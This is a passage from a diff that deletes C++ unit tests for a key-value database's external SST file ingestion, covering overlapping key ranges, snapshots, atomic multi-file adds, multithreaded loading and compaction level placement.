-    ASSERT_NOK(s);
-
-    DestroyAndReopen(options);
-    // Add file using file path
-    s = DeprecatedAddFile({file1});
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 100; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    // Add file while holding a snapshot will fail
-    const Snapshot* s1 = db_->GetSnapshot();
-    if (s1 != nullptr) {
-      ASSERT_NOK(DeprecatedAddFile({file2}));
-      db_->ReleaseSnapshot(s1);
-    }
-    // We can add the file after releaseing the snapshot
-    ASSERT_OK(DeprecatedAddFile({file2}));
-
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 200; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    // This file has overlapping values with the existing data
-    s = DeprecatedAddFile({file3});
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // This file has overlapping values with the existing data
-    s = DeprecatedAddFile({file4});
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Overwrite values of keys divisible by 5
-    for (int k = 0; k < 200; k += 5) {
-      ASSERT_OK(Put(Key(k), Key(k) + "_val_new"));
-    }
-    ASSERT_NE(db_->GetLatestSequenceNumber(), 0U);
-
-    // Key range of file5 (400 => 499) dont overlap with any keys in DB
-    ASSERT_OK(DeprecatedAddFile({file5}));
-
-    // Make sure values are correct before and after flush/compaction
-    for (int i = 0; i < 2; i++) {
-      for (int k = 0; k < 200; k++) {
-        std::string value = Key(k) + "_val";
-        if (k % 5 == 0) {
-          value += "_new";
-        }
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      for (int k = 400; k < 500; k++) {
-        std::string value = Key(k) + "_val";
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    Close();
-    options.disable_auto_compactions = true;
-    Reopen(options);
-
-    // Delete keys in range (400 => 499)
-    for (int k = 400; k < 500; k++) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    // We deleted range (400 => 499) but cannot add file5 because
-    // of the range tombstones
-    ASSERT_NOK(DeprecatedAddFile({file5}));
-
-    // Compacting the DB will remove the tombstones
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-    // Now we can add the file
-    ASSERT_OK(DeprecatedAddFile({file5}));
-
-    // Verify values of file5 in DB
-    for (int k = 400; k < 500; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-class SstFileWriterCollector : public TablePropertiesCollector {
- public:
-  explicit SstFileWriterCollector(const std::string prefix) : prefix_(prefix) {
-    name_ = prefix_ + "_SstFileWriterCollector";
-  }
-
-  const char* Name() const override { return name_.c_str(); }
-
-  Status Finish(UserCollectedProperties* properties) override {
-    *properties = UserCollectedProperties{
-        {prefix_ + "_SstFileWriterCollector", "YES"},
-        {prefix_ + "_Count", std::to_string(count_)},
-    };
-    return Status::OK();
-  }
-
-  Status AddUserKey(const Slice& user_key, const Slice& value, EntryType type,
-                    SequenceNumber seq, uint64_t file_size) override {
-    ++count_;
-    return Status::OK();
-  }
-
-  virtual UserCollectedProperties GetReadableProperties() const override {
-    return UserCollectedProperties{};
-  }
-
- private:
-  uint32_t count_ = 0;
-  std::string prefix_;
-  std::string name_;
-};
-
-class SstFileWriterCollectorFactory : public TablePropertiesCollectorFactory {
- public:
-  explicit SstFileWriterCollectorFactory(std::string prefix)
-      : prefix_(prefix), num_created_(0) {}
-  virtual TablePropertiesCollector* CreateTablePropertiesCollector(
-      TablePropertiesCollectorFactory::Context context) override {
-    num_created_++;
-    return new SstFileWriterCollector(prefix_);
-  }
-  const char* Name() const override { return "SstFileWriterCollectorFactory"; }
-
-  std::string prefix_;
-  uint32_t num_created_;
-};
-
-TEST_F(ExternalSSTFileTest, AddList) {
-  do {
-    Options options = CurrentOptions();
-
-    auto abc_collector = std::make_shared<SstFileWriterCollectorFactory>("abc");
-    auto xyz_collector = std::make_shared<SstFileWriterCollectorFactory>("xyz");
-
-    options.table_properties_collector_factories.emplace_back(abc_collector);
-    options.table_properties_collector_factories.emplace_back(xyz_collector);
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // file1.sst (0 => 99)
-    std::string file1 = sst_files_dir_ + "file1.sst";
-    ASSERT_OK(sst_file_writer.Open(file1));
-    for (int k = 0; k < 100; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file1_info;
-    Status s = sst_file_writer.Finish(&file1_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file1_info.file_path, file1);
-    ASSERT_EQ(file1_info.num_entries, 100);
-    ASSERT_EQ(file1_info.smallest_key, Key(0));
-    ASSERT_EQ(file1_info.largest_key, Key(99));
-    // sst_file_writer already finished, cannot add this value
-    s = sst_file_writer.Put(Key(100), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // file2.sst (100 => 199)
-    std::string file2 = sst_files_dir_ + "file2.sst";
-    ASSERT_OK(sst_file_writer.Open(file2));
-    for (int k = 100; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    // Cannot add this key because it's not after last added key
-    s = sst_file_writer.Put(Key(99), "bad_val");
-    ASSERT_FALSE(s.ok()) << s.ToString();
-    ExternalSstFileInfo file2_info;
-    s = sst_file_writer.Finish(&file2_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file2_info.file_path, file2);
-    ASSERT_EQ(file2_info.num_entries, 100);
-    ASSERT_EQ(file2_info.smallest_key, Key(100));
-    ASSERT_EQ(file2_info.largest_key, Key(199));
-
-    // file3.sst (195 => 199)
-    // This file values overlap with file2 values
-    std::string file3 = sst_files_dir_ + "file3.sst";
-    ASSERT_OK(sst_file_writer.Open(file3));
-    for (int k = 195; k < 200; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file3_info;
-    s = sst_file_writer.Finish(&file3_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file3_info.file_path, file3);
-    ASSERT_EQ(file3_info.num_entries, 5);
-    ASSERT_EQ(file3_info.smallest_key, Key(195));
-    ASSERT_EQ(file3_info.largest_key, Key(199));
-
-    // file4.sst (30 => 39)
-    // This file values overlap with file1 values
-    std::string file4 = sst_files_dir_ + "file4.sst";
-    ASSERT_OK(sst_file_writer.Open(file4));
-    for (int k = 30; k < 40; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val_overlap"));
-    }
-    ExternalSstFileInfo file4_info;
-    s = sst_file_writer.Finish(&file4_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file4_info.file_path, file4);
-    ASSERT_EQ(file4_info.num_entries, 10);
-    ASSERT_EQ(file4_info.smallest_key, Key(30));
-    ASSERT_EQ(file4_info.largest_key, Key(39));
-
-    // file5.sst (200 => 299)
-    std::string file5 = sst_files_dir_ + "file5.sst";
-    ASSERT_OK(sst_file_writer.Open(file5));
-    for (int k = 200; k < 300; k++) {
-      ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-    }
-    ExternalSstFileInfo file5_info;
-    s = sst_file_writer.Finish(&file5_info);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(file5_info.file_path, file5);
-    ASSERT_EQ(file5_info.num_entries, 100);
-    ASSERT_EQ(file5_info.smallest_key, Key(200));
-    ASSERT_EQ(file5_info.largest_key, Key(299));
-
-    // list 1 has internal key range conflict
-    std::vector<std::string> file_list0({file1, file2});
-    std::vector<std::string> file_list1({file3, file2, file1});
-    std::vector<std::string> file_list2({file5});
-    std::vector<std::string> file_list3({file3, file4});
-
-    DestroyAndReopen(options);
-
-    // This list of files have key ranges are overlapping with each other
-    s = DeprecatedAddFile(file_list1);
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Add files using file path list
-    s = DeprecatedAddFile(file_list0);
-    ASSERT_TRUE(s.ok()) << s.ToString();
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 200; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    TablePropertiesCollection props;
-    ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-    ASSERT_EQ(props.size(), 2);
-    for (auto file_props : props) {
-      auto user_props = file_props.second->user_collected_properties;
-      ASSERT_EQ(user_props["abc_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["xyz_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["abc_Count"], "100");
-      ASSERT_EQ(user_props["xyz_Count"], "100");
-    }
-
-    // Add file while holding a snapshot will fail
-    const Snapshot* s1 = db_->GetSnapshot();
-    if (s1 != nullptr) {
-      ASSERT_NOK(DeprecatedAddFile(file_list2));
-      db_->ReleaseSnapshot(s1);
-    }
-    // We can add the file after releaseing the snapshot
-    ASSERT_OK(DeprecatedAddFile(file_list2));
-    ASSERT_EQ(db_->GetLatestSequenceNumber(), 0U);
-    for (int k = 0; k < 300; k++) {
-      ASSERT_EQ(Get(Key(k)), Key(k) + "_val");
-    }
-
-    ASSERT_OK(db_->GetPropertiesOfAllTables(&props));
-    ASSERT_EQ(props.size(), 3);
-    for (auto file_props : props) {
-      auto user_props = file_props.second->user_collected_properties;
-      ASSERT_EQ(user_props["abc_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["xyz_SstFileWriterCollector"], "YES");
-      ASSERT_EQ(user_props["abc_Count"], "100");
-      ASSERT_EQ(user_props["xyz_Count"], "100");
-    }
-
-    // This file list has overlapping values with the existing data
-    s = DeprecatedAddFile(file_list3);
-    ASSERT_FALSE(s.ok()) << s.ToString();
-
-    // Overwrite values of keys divisible by 5
-    for (int k = 0; k < 200; k += 5) {
-      ASSERT_OK(Put(Key(k), Key(k) + "_val_new"));
-    }
-    ASSERT_NE(db_->GetLatestSequenceNumber(), 0U);
-
-    // Make sure values are correct before and after flush/compaction
-    for (int i = 0; i < 2; i++) {
-      for (int k = 0; k < 200; k++) {
-        std::string value = Key(k) + "_val";
-        if (k % 5 == 0) {
-          value += "_new";
-        }
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      for (int k = 200; k < 300; k++) {
-        std::string value = Key(k) + "_val";
-        ASSERT_EQ(Get(Key(k)), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    // Delete keys in range (200 => 299)
-    for (int k = 200; k < 300; k++) {
-      ASSERT_OK(Delete(Key(k)));
-    }
-    // We deleted range (200 => 299) but cannot add file5 because
-    // of the range tombstones
-    ASSERT_NOK(DeprecatedAddFile(file_list2));
-
-    // Compacting the DB will remove the tombstones
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-
-    // Now we can add the file
-    ASSERT_OK(DeprecatedAddFile(file_list2));
-
-    // Verify values of file5 in DB
-    for (int k = 200; k < 300; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, AddListAtomicity) {
-  do {
-    Options options = CurrentOptions();
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    // files[0].sst (0 => 99)
-    // files[1].sst (100 => 199)
-    // ...
-    // file[8].sst (800 => 899)
-    int n = 9;
-    std::vector<std::string> files(n);
-    std::vector<ExternalSstFileInfo> files_info(n);
-    for (int i = 0; i < n; i++) {
-      files[i] = sst_files_dir_ + "file" + std::to_string(i) + ".sst";
-      ASSERT_OK(sst_file_writer.Open(files[i]));
-      for (int k = i * 100; k < (i + 1) * 100; k++) {
-        ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-      }
-      Status s = sst_file_writer.Finish(&files_info[i]);
-      ASSERT_TRUE(s.ok()) << s.ToString();
-      ASSERT_EQ(files_info[i].file_path, files[i]);
-      ASSERT_EQ(files_info[i].num_entries, 100);
-      ASSERT_EQ(files_info[i].smallest_key, Key(i * 100));
-      ASSERT_EQ(files_info[i].largest_key, Key((i + 1) * 100 - 1));
-    }
-    files.push_back(sst_files_dir_ + "file" + std::to_string(n) + ".sst");
-    auto s = DeprecatedAddFile(files);
-    ASSERT_NOK(s) << s.ToString();
-    for (int k = 0; k < n * 100; k++) {
-      ASSERT_EQ("NOT_FOUND", Get(Key(k)));
-    }
-    files.pop_back();
-    ASSERT_OK(DeprecatedAddFile(files));
-    for (int k = 0; k < n * 100; k++) {
-      std::string value = Key(k) + "_val";
-      ASSERT_EQ(Get(Key(k)), value);
-    }
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-// This test reporduce a bug that can happen in some cases if the DB started
-// purging obsolete files when we are adding an external sst file.
-// This situation may result in deleting the file while it's being added.
-TEST_F(ExternalSSTFileTest, PurgeObsoleteFilesBug) {
-  Options options = CurrentOptions();
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 500)
-  std::string sst_file_path = sst_files_dir_ + "file1.sst";
-  Status s = sst_file_writer.Open(sst_file_path);
-  ASSERT_OK(s);
-  for (int i = 0; i < 500; i++) {
-    std::string k = Key(i);
-    s = sst_file_writer.Put(k, k + "_val");
-    ASSERT_OK(s);
-  }
-
-  ExternalSstFileInfo sst_file_info;
-  s = sst_file_writer.Finish(&sst_file_info);
-  ASSERT_OK(s);
-
-  options.delete_obsolete_files_period_micros = 0;
-  options.disable_auto_compactions = true;
-  DestroyAndReopen(options);
-
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::AddFile:FileCopied", [&](void* arg) {
-        ASSERT_OK(Put("aaa", "bbb"));
-        ASSERT_OK(Flush());
-        ASSERT_OK(Put("aaa", "xxx"));
-        ASSERT_OK(Flush());
-        db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  s = DeprecatedAddFile({sst_file_path});
-  ASSERT_OK(s);
-
-  for (int i = 0; i < 500; i++) {
-    std::string k = Key(i);
-    std::string v = k + "_val";
-    ASSERT_EQ(Get(k), v);
-  }
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, SkipSnapshot) {
-  Options options = CurrentOptions();
-
-  SstFileWriter sst_file_writer(EnvOptions(), options);
-
-  // file1.sst (0 => 99)
-  std::string file1 = sst_files_dir_ + "file1.sst";
-  ASSERT_OK(sst_file_writer.Open(file1));
-  for (int k = 0; k < 100; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file1_info;
-  Status s = sst_file_writer.Finish(&file1_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file1_info.file_path, file1);
-  ASSERT_EQ(file1_info.num_entries, 100);
-  ASSERT_EQ(file1_info.smallest_key, Key(0));
-  ASSERT_EQ(file1_info.largest_key, Key(99));
-
-  // file2.sst (100 => 299)
-  std::string file2 = sst_files_dir_ + "file2.sst";
-  ASSERT_OK(sst_file_writer.Open(file2));
-  for (int k = 100; k < 300; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file2_info;
-  s = sst_file_writer.Finish(&file2_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file2_info.file_path, file2);
-  ASSERT_EQ(file2_info.num_entries, 200);
-  ASSERT_EQ(file2_info.smallest_key, Key(100));
-  ASSERT_EQ(file2_info.largest_key, Key(299));
-
-  ASSERT_OK(DeprecatedAddFile({file1}));
-
-  // Add file will fail when holding snapshot and use the default
-  // skip_snapshot_check to false
-  const Snapshot* s1 = db_->GetSnapshot();
-  if (s1 != nullptr) {
-    ASSERT_NOK(DeprecatedAddFile({file2}));
-  }
-
-  // Add file will success when set skip_snapshot_check to true even db holding
-  // snapshot
-  if (s1 != nullptr) {
-    ASSERT_OK(DeprecatedAddFile({file2}, false, true));
-    db_->ReleaseSnapshot(s1);
-  }
-
-  // file3.sst (300 => 399)
-  std::string file3 = sst_files_dir_ + "file3.sst";
-  ASSERT_OK(sst_file_writer.Open(file3));
-  for (int k = 300; k < 400; k++) {
-    ASSERT_OK(sst_file_writer.Put(Key(k), Key(k) + "_val"));
-  }
-  ExternalSstFileInfo file3_info;
-  s = sst_file_writer.Finish(&file3_info);
-  ASSERT_TRUE(s.ok()) << s.ToString();
-  ASSERT_EQ(file3_info.file_path, file3);
-  ASSERT_EQ(file3_info.num_entries, 100);
-  ASSERT_EQ(file3_info.smallest_key, Key(300));
-  ASSERT_EQ(file3_info.largest_key, Key(399));
-
-  // check that we have change the old key
-  ASSERT_EQ(Get(Key(300)), "NOT_FOUND");
-  const Snapshot* s2 = db_->GetSnapshot();
-  ASSERT_OK(DeprecatedAddFile({file3}, false, true));
-  ASSERT_EQ(Get(Key(300)), Key(300) + ("_val"));
-  ASSERT_EQ(Get(Key(300), s2), Key(300) + ("_val"));
-
-  db_->ReleaseSnapshot(s2);
-}
-
-TEST_F(ExternalSSTFileTest, MultiThreaded) {
-  // Bulk load 10 files every file contain 1000 keys
-  int num_files = 10;
-  int keys_per_file = 1000;
-
-  // Generate file names
-  std::vector<std::string> file_names;
-  for (int i = 0; i < num_files; i++) {
-    std::string file_name = "file_" + ToString(i) + ".sst";
-    file_names.push_back(sst_files_dir_ + file_name);
-  }
-
-  do {
-    Options options = CurrentOptions();
-
-    std::atomic<int> thread_num(0);
-    std::function<void()> write_file_func = [&]() {
-      int file_idx = thread_num.fetch_add(1);
-      int range_start = file_idx * keys_per_file;
-      int range_end = range_start + keys_per_file;
-
-      SstFileWriter sst_file_writer(EnvOptions(), options);
-
-      ASSERT_OK(sst_file_writer.Open(file_names[file_idx]));
-
-      for (int k = range_start; k < range_end; k++) {
-        ASSERT_OK(sst_file_writer.Put(Key(k), Key(k)));
-      }
-
-      Status s = sst_file_writer.Finish();
-      ASSERT_TRUE(s.ok()) << s.ToString();
-    };
-    // Write num_files files in parallel
-    std::vector<port::Thread> sst_writer_threads;
-    for (int i = 0; i < num_files; ++i) {
-      sst_writer_threads.emplace_back(write_file_func);
-    }
-
-    for (auto& t : sst_writer_threads) {
-      t.join();
-    }
-
-    fprintf(stderr, "Wrote %d files (%d keys)\n", num_files,
-            num_files * keys_per_file);
-
-    thread_num.store(0);
-    std::atomic<int> files_added(0);
-    // Thread 0 -> Load {f0,f1}
-    // Thread 1 -> Load {f0,f1}
-    // Thread 2 -> Load {f2,f3}
-    // Thread 3 -> Load {f2,f3}
-    // Thread 4 -> Load {f4,f5}
-    // Thread 5 -> Load {f4,f5}
-    // ...
-    std::function<void()> load_file_func = [&]() {
-      // We intentionally add every file twice, and assert that it was added
-      // only once and the other add failed
-      int thread_id = thread_num.fetch_add(1);
-      int file_idx = (thread_id / 2) * 2;
-      // sometimes we use copy, sometimes link .. the result should be the same
-      bool move_file = (thread_id % 3 == 0);
-
-      std::vector<std::string> files_to_add;
-
-      files_to_add = {file_names[file_idx]};
-      if (static_cast<size_t>(file_idx + 1) < file_names.size()) {
-        files_to_add.push_back(file_names[file_idx + 1]);
-      }
-
-      Status s = DeprecatedAddFile(files_to_add, move_file);
-      if (s.ok()) {
-        files_added += static_cast<int>(files_to_add.size());
-      }
-    };
-
-    // Bulk load num_files files in parallel
-    std::vector<port::Thread> add_file_threads;
-    DestroyAndReopen(options);
-    for (int i = 0; i < num_files; ++i) {
-      add_file_threads.emplace_back(load_file_func);
-    }
-
-    for (auto& t : add_file_threads) {
-      t.join();
-    }
-    ASSERT_EQ(files_added.load(), num_files);
-    fprintf(stderr, "Loaded %d files (%d keys)\n", num_files,
-            num_files * keys_per_file);
-
-    // Overwrite values of keys divisible by 100
-    for (int k = 0; k < num_files * keys_per_file; k += 100) {
-      std::string key = Key(k);
-      Status s = Put(key, key + "_new");
-      ASSERT_TRUE(s.ok());
-    }
-
-    for (int i = 0; i < 2; i++) {
-      // Make sure the values are correct before and after flush/compaction
-      for (int k = 0; k < num_files * keys_per_file; ++k) {
-        std::string key = Key(k);
-        std::string value = (k % 100 == 0) ? (key + "_new") : key;
-        ASSERT_EQ(Get(key), value);
-      }
-      ASSERT_OK(Flush());
-      ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-    }
-
-    fprintf(stderr, "Verified %d values\n", num_files * keys_per_file);
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, OverlappingRanges) {
-  Random rnd(301);
-  int picked_level = 0;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "ExternalSstFileIngestionJob::Run", [&picked_level](void* arg) {
-      ASSERT_TRUE(arg != nullptr);
-      picked_level = *(static_cast<int*>(arg));
-    });
-  bool need_flush = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-    "DBImpl::IngestExternalFile:NeedFlush", [&need_flush](void* arg) {
-      ASSERT_TRUE(arg != nullptr);
-      need_flush = *(static_cast<bool*>(arg));
-    });
-  bool overlap_with_db = false;
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "ExternalSstFileIngestionJob::AssignLevelAndSeqnoForIngestedFile",
-      [&overlap_with_db](void* arg) {
-        ASSERT_TRUE(arg != nullptr);
-        overlap_with_db = *(static_cast<bool*>(arg));
-      });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-  do {
-    Options options = CurrentOptions();
-    DestroyAndReopen(options);
-
-    SstFileWriter sst_file_writer(EnvOptions(), options);
-
-    printf("Option config = %d\n", option_config_);
-    std::vector<std::pair<int, int>> key_ranges;
-    for (int i = 0; i < 500; i++) {
-      int range_start = rnd.Uniform(20000);
-      int keys_per_range = 10 + rnd.Uniform(41);
-
-      key_ranges.emplace_back(range_start, range_start + keys_per_range);
-    }
-
-    int memtable_add = 0;
-    int success_add_file = 0;
-    int failed_add_file = 0;
-    std::map<std::string, std::string> true_data;
-    for (size_t i = 0; i < key_ranges.size(); i++) {
-      int range_start = key_ranges[i].first;
-      int range_end = key_ranges[i].second;
-
-      Status s;
-      std::string range_val = "range_" + ToString(i);
-
-      // For 20% of ranges we use DB::Put, for 80% we use DB::AddFile
-      if (i && i % 5 == 0) {
-        // Use DB::Put to insert range (insert into memtable)
-        range_val += "_put";
-        for (int k = range_start; k <= range_end; k++) {
-          s = Put(Key(k), range_val);
-          ASSERT_OK(s);
-        }
-        memtable_add++;
-      } else {
-        // Use DB::AddFile to insert range
-        range_val += "_add_file";
-
-        // Generate the file containing the range
-        std::string file_name = sst_files_dir_ + env_->GenerateUniqueId();
-        ASSERT_OK(sst_file_writer.Open(file_name));
-        for (int k = range_start; k <= range_end; k++) {
-          s = sst_file_writer.Put(Key(k), range_val);
-          ASSERT_OK(s);
-        }
-        ExternalSstFileInfo file_info;
-        s = sst_file_writer.Finish(&file_info);
-        ASSERT_OK(s);
-
-        // Insert the generated file
-        s = DeprecatedAddFile({file_name});
-        auto it = true_data.lower_bound(Key(range_start));
-        if (option_config_ != kUniversalCompaction &&
-            option_config_ != kUniversalCompactionMultiLevel) {
-          if (it != true_data.end() && it->first <= Key(range_end)) {
-            // This range overlap with data already exist in DB
-            ASSERT_NOK(s);
-            failed_add_file++;
-          } else {
-            ASSERT_OK(s);
-            success_add_file++;
-          }
-        } else {
-          if ((it != true_data.end() && it->first <= Key(range_end)) ||
-              need_flush || picked_level > 0 || overlap_with_db) {
-            // This range overlap with data already exist in DB
-            ASSERT_NOK(s);
-            failed_add_file++;
-          } else {
-            ASSERT_OK(s);
-            success_add_file++;
-          }
-        }
-      }
-
-      if (s.ok()) {
-        // Update true_data map to include the new inserted data
-        for (int k = range_start; k <= range_end; k++) {
-          true_data[Key(k)] = range_val;
-        }
-      }
-
-      // Flush / Compact the DB
-      if (i && i % 50 == 0) {
-        Flush();
-      }
-      if (i && i % 75 == 0) {
-        db_->CompactRange(CompactRangeOptions(), nullptr, nullptr);
-      }
-    }
-
-    printf("Total: %" ROCKSDB_PRIszt
-           " ranges\n"
-           "AddFile()|Success: %d ranges\n"
-           "AddFile()|RangeConflict: %d ranges\n"
-           "Put(): %d ranges\n",
-           key_ranges.size(), success_add_file, failed_add_file, memtable_add);
-
-    // Verify the correctness of the data
-    for (const auto& kv : true_data) {
-      ASSERT_EQ(Get(kv.first), kv.second);
-    }
-    printf("keys/values verified\n");
-    DestroyAndRecreateExternalSSTFilesDir();
-  } while (ChangeOptions(kSkipPlainTable | kSkipFIFOCompaction));
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevel) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 4;
-  options.num_levels = 4;
-  DestroyAndReopen(options);
-
-  std::map<std::string, std::string> true_data;
-
-  // File 0 will go to last level (L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {1, 10}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "0,0,0,1");
-
-  // File 1 will go to level L2 (since it overlap with file 0 in L3)
-  ASSERT_OK(GenerateAndAddExternalFile(options, {2, 9}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "0,0,1,1");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency({
-      {"ExternalSSTFileTest::PickedLevel:0", "BackgroundCallCompaction:0"},
-      {"DBImpl::BackgroundCompaction:Start",
-       "ExternalSSTFileTest::PickedLevel:1"},
-      {"ExternalSSTFileTest::PickedLevel:2",
-       "DBImpl::BackgroundCompaction:NonTrivial:AfterRun"},
-  });
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // Flush 4 files containing the same keys
-  for (int i = 0; i < 4; i++) {
-    ASSERT_OK(Put(Key(3), Key(3) + "put"));
-    ASSERT_OK(Put(Key(8), Key(8) + "put"));
-    true_data[Key(3)] = Key(3) + "put";
-    true_data[Key(8)] = Key(8) + "put";
-    ASSERT_OK(Flush());
-  }
-
-  // Wait for BackgroundCompaction() to be called
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:0");
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:1");
-
-  EXPECT_EQ(FilesPerLevel(), "4,0,1,1");
-
-  // This file overlaps with file 0 (L3), file 1 (L2) and the
-  // output of compaction going to L1
-  ASSERT_OK(GenerateAndAddExternalFile(options, {4, 7}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,1,1");
-
-  // This file does not overlap with any file or with the running compaction
-  ASSERT_OK(GenerateAndAddExternalFile(options, {9000, 9001}, -1, false, false,
-                                       &true_data));
-  EXPECT_EQ(FilesPerLevel(), "5,0,1,2");
-
-  // Hold compaction from finishing
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevel:2");
-
-  dbfull()->TEST_WaitForCompact();
-  EXPECT_EQ(FilesPerLevel(), "1,1,1,2");
-
-  size_t kcnt = 0;
-  VerifyDBFromMap(true_data, &kcnt, false);
-
-  rocksdb::SyncPoint::GetInstance()->DisableProcessing();
-}
-
-TEST_F(ExternalSSTFileTest, PickedLevelBug) {
-  Options options = CurrentOptions();
-  options.disable_auto_compactions = false;
-  options.level0_file_num_compaction_trigger = 3;
-  options.num_levels = 2;
-  DestroyAndReopen(options);
-
-  std::vector<int> file_keys;
-
-  // file #1 in L0
-  file_keys = {0, 5, 7};
-  for (int k : file_keys) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-  }
-  ASSERT_OK(Flush());
-
-  // file #2 in L0
-  file_keys = {4, 6, 8, 9};
-  for (int k : file_keys) {
-    ASSERT_OK(Put(Key(k), Key(k)));
-  }
-  ASSERT_OK(Flush());
-
-  // We have 2 overlapping files in L0
-  EXPECT_EQ(FilesPerLevel(), "2");
-
-  rocksdb::SyncPoint::GetInstance()->LoadDependency(
-      {{"DBImpl::AddFile:MutexLock", "ExternalSSTFileTest::PickedLevelBug:0"},
-       {"ExternalSSTFileTest::PickedLevelBug:1", "DBImpl::AddFile:MutexUnlock"},
-       {"ExternalSSTFileTest::PickedLevelBug:2",
-        "DBImpl::RunManualCompaction:0"},
-       {"ExternalSSTFileTest::PickedLevelBug:3",
-        "DBImpl::RunManualCompaction:1"}});
-
-  std::atomic<bool> bg_compact_started(false);
-  rocksdb::SyncPoint::GetInstance()->SetCallBack(
-      "DBImpl::BackgroundCompaction:Start",
-      [&](void* arg) { bg_compact_started.store(true); });
-
-  rocksdb::SyncPoint::GetInstance()->EnableProcessing();
-
-  // While writing the MANIFEST start a thread that will ask for compaction
-  rocksdb::port::Thread bg_compact([&]() {
-    ASSERT_OK(db_->CompactRange(CompactRangeOptions(), nullptr, nullptr));
-  });
-  TEST_SYNC_POINT("ExternalSSTFileTest::PickedLevelBug:2");
-
-  // Start a thread that will ingest a new file
-  rocksdb::port::Thread bg_addfile([&]() {
